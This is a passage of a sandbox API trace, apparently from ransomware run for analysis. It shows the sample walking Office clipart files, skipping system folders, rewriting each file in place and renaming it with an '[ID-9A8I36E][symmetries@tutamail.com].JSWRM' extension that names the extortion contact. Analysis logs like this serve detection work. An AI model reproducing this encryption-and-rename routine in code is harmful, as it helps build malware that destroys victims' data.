Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00057_.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00057_.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0073.447] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2476a8 | out: hHeap=0x1e0000) returned 1 [0073.447] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0073.447] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0073.447] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xec210f4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xec210f4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xec210f4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x205, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="AG00090_.GIF", cAlternateFileName="")) returned 1 [0073.447] lstrcmpiW (lpString1="AG00090_.GIF", lpString2=".") returned 1 [0073.447] lstrcmpiW (lpString1="AG00090_.GIF", lpString2="..") returned 1 [0073.447] lstrcmpiW (lpString1="AG00090_.GIF", lpString2="...") returned 1 [0073.447] lstrcmpiW (lpString1="AG00090_.GIF", lpString2="windows") returned -1 [0073.447] lstrcmpiW (lpString1="AG00090_.GIF", lpString2="recovery") returned -1 [0073.448] lstrcmpiW (lpString1="AG00090_.GIF", lpString2="perflogs") returned -1 [0073.448] lstrcmpiW (lpString1="AG00090_.GIF", lpString2="documents and settings") returned -1 [0073.448] lstrcmpiW (lpString1="AG00090_.GIF", lpString2="$RECYCLE.BIN") returned 1 [0073.448] lstrcmpiW (lpString1="AG00090_.GIF", lpString2="system volume information") returned -1 [0073.448] lstrcmpiW (lpString1="AG00090_.GIF", lpString2="msocache") returned -1 [0073.448] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0073.448] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AG00090_.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0073.448] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AG00090_.GIF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AG00090_.GIF", lpUsedDefaultChar=0x0) returned 12 [0073.448] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0073.448] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0073.448] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AG00090_.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0073.448] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AG00090_.GIF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AG00090_.GIF", lpUsedDefaultChar=0x0) returned 12 [0073.448] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0073.448] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0073.448] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0073.448] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0073.448] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0073.448] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0073.448] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00090_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00090_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0073.449] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=517) returned 1 [0073.449] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0073.449] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x200) returned 0x242d18 [0073.449] ReadFile (in: hFile=0x460, lpBuffer=0x242d18, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x242d18*, lpNumberOfBytesRead=0x345e89c*=0x200, lpOverlapped=0x0) returned 1 [0073.450] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0073.450] WriteFile (in: hFile=0x460, lpBuffer=0x242d18*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x242d18*, lpNumberOfBytesWritten=0x345e898*=0x200, lpOverlapped=0x0) returned 1 [0073.451] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x242d18 | out: hHeap=0x1e0000) returned 1 [0073.451] CloseHandle (hObject=0x460) returned 1 [0073.451] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0073.451] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0073.451] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0073.451] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0073.451] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0073.451] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0073.451] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0073.451] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a270 [0073.451] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a270, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0073.451] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a270 | out: hHeap=0x1e0000) returned 1 [0073.451] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0073.451] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247e68 [0073.451] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0073.451] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0073.451] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00090_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00090_.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00090_.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00090_.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0073.452] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247e68 | out: hHeap=0x1e0000) returned 1 [0073.452] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0073.452] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0073.452] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xec210f4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xec210f4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xec210f4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1f6, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="AG00092_.GIF", cAlternateFileName="")) returned 1 [0073.452] lstrcmpiW (lpString1="AG00092_.GIF", lpString2=".") returned 1 [0073.452] lstrcmpiW (lpString1="AG00092_.GIF", lpString2="..") returned 1 [0073.452] lstrcmpiW (lpString1="AG00092_.GIF", lpString2="...") returned 1 [0073.452] lstrcmpiW (lpString1="AG00092_.GIF", lpString2="windows") returned -1 [0073.452] lstrcmpiW (lpString1="AG00092_.GIF", lpString2="recovery") returned -1 [0073.452] lstrcmpiW (lpString1="AG00092_.GIF", lpString2="perflogs") returned -1 [0073.452] lstrcmpiW (lpString1="AG00092_.GIF", lpString2="documents and settings") returned -1 [0073.452] lstrcmpiW (lpString1="AG00092_.GIF", lpString2="$RECYCLE.BIN") returned 1 [0073.453] lstrcmpiW (lpString1="AG00092_.GIF", lpString2="system volume information") returned -1 [0073.453] lstrcmpiW (lpString1="AG00092_.GIF", lpString2="msocache") returned -1 [0073.453] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0073.453] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AG00092_.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0073.453] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AG00092_.GIF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AG00092_.GIF", lpUsedDefaultChar=0x0) returned 12 [0073.453] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0073.453] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411f0 [0073.453] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AG00092_.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0073.453] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AG00092_.GIF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AG00092_.GIF", lpUsedDefaultChar=0x0) returned 12 [0073.456] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411f0 | out: hHeap=0x1e0000) returned 1 [0073.456] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0073.456] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0073.456] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0073.456] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0073.456] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0073.456] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00092_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00092_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0073.456] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=502) returned 1 [0073.457] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0073.457] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1f0) returned 0x209950 [0073.457] ReadFile (in: hFile=0x460, lpBuffer=0x209950, nNumberOfBytesToRead=0x1f0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x209950*, lpNumberOfBytesRead=0x345e89c*=0x1f0, lpOverlapped=0x0) returned 1 [0073.458] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0073.458] WriteFile (in: hFile=0x460, lpBuffer=0x209950*, nNumberOfBytesToWrite=0x1f0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x209950*, lpNumberOfBytesWritten=0x345e898*=0x1f0, lpOverlapped=0x0) returned 1 [0073.458] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209950 | out: hHeap=0x1e0000) returned 1 [0073.458] CloseHandle (hObject=0x460) returned 1 [0073.458] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0073.458] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0073.458] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0073.458] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0073.458] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0073.458] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0073.458] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0073.458] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a210 [0073.458] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a210, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0073.458] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a210 | out: hHeap=0x1e0000) returned 1 [0073.458] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0073.458] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247d70 [0073.458] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0073.458] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0073.458] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00092_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00092_.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00092_.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00092_.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0073.459] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247d70 | out: hHeap=0x1e0000) returned 1 [0073.459] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0073.459] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0073.459] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcb32840, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcb32840, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcb32840, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x319e, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="AG00103_.GIF", cAlternateFileName="")) returned 1 [0073.459] lstrcmpiW (lpString1="AG00103_.GIF", lpString2=".") returned 1 [0073.459] lstrcmpiW (lpString1="AG00103_.GIF", lpString2="..") returned 1 [0073.459] lstrcmpiW (lpString1="AG00103_.GIF", lpString2="...") returned 1 [0073.459] lstrcmpiW (lpString1="AG00103_.GIF", lpString2="windows") returned -1 [0073.459] lstrcmpiW (lpString1="AG00103_.GIF", lpString2="recovery") returned -1 [0073.459] lstrcmpiW (lpString1="AG00103_.GIF", lpString2="perflogs") returned -1 [0073.459] lstrcmpiW (lpString1="AG00103_.GIF", lpString2="documents and settings") returned -1 [0073.459] lstrcmpiW (lpString1="AG00103_.GIF", lpString2="$RECYCLE.BIN") returned 1 [0073.459] lstrcmpiW (lpString1="AG00103_.GIF", lpString2="system volume information") returned -1 [0073.459] lstrcmpiW (lpString1="AG00103_.GIF", lpString2="msocache") returned -1 [0073.459] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0073.459] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AG00103_.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0073.459] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AG00103_.GIF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AG00103_.GIF", lpUsedDefaultChar=0x0) returned 12 [0073.459] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0073.459] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0073.459] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AG00103_.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0073.459] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AG00103_.GIF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AG00103_.GIF", lpUsedDefaultChar=0x0) returned 12 [0073.459] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0073.460] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0073.460] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0073.460] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0073.460] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0073.460] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0073.460] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00103_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00103_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0073.460] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=12702) returned 1 [0073.460] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0073.460] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x3190) returned 0x24c1d0 [0073.460] ReadFile (in: hFile=0x460, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x3190, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x3190, lpOverlapped=0x0) returned 1 [0073.463] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0073.463] WriteFile (in: hFile=0x460, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x3190, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x3190, lpOverlapped=0x0) returned 1 [0073.463] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0073.463] CloseHandle (hObject=0x460) returned 1 [0073.463] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0073.463] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0073.463] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0073.463] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d298, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0073.463] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0073.463] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0073.463] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0073.463] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a240 [0073.463] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a240, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0073.463] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a240 | out: hHeap=0x1e0000) returned 1 [0073.463] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d140 [0073.463] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2472c8 [0073.463] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d140 | out: hHeap=0x1e0000) returned 1 [0073.463] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0073.463] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00103_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00103_.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00103_.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00103_.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0073.464] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2472c8 | out: hHeap=0x1e0000) returned 1 [0073.464] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0073.464] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0073.464] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcb32840, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcb32840, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcb32840, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xd9c, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="AG00120_.GIF", cAlternateFileName="")) returned 1 [0073.464] lstrcmpiW (lpString1="AG00120_.GIF", lpString2=".") returned 1 [0073.464] lstrcmpiW (lpString1="AG00120_.GIF", lpString2="..") returned 1 [0073.464] lstrcmpiW (lpString1="AG00120_.GIF", lpString2="...") returned 1 [0073.464] lstrcmpiW (lpString1="AG00120_.GIF", lpString2="windows") returned -1 [0073.464] lstrcmpiW (lpString1="AG00120_.GIF", lpString2="recovery") returned -1 [0073.464] lstrcmpiW (lpString1="AG00120_.GIF", lpString2="perflogs") returned -1 [0073.464] lstrcmpiW (lpString1="AG00120_.GIF", lpString2="documents and settings") returned -1 [0073.464] lstrcmpiW (lpString1="AG00120_.GIF", lpString2="$RECYCLE.BIN") returned 1 [0073.464] lstrcmpiW (lpString1="AG00120_.GIF", lpString2="system volume information") returned -1 [0073.464] lstrcmpiW (lpString1="AG00120_.GIF", lpString2="msocache") returned -1 [0073.464] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0073.464] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AG00120_.GIF", cchWideChar=12, 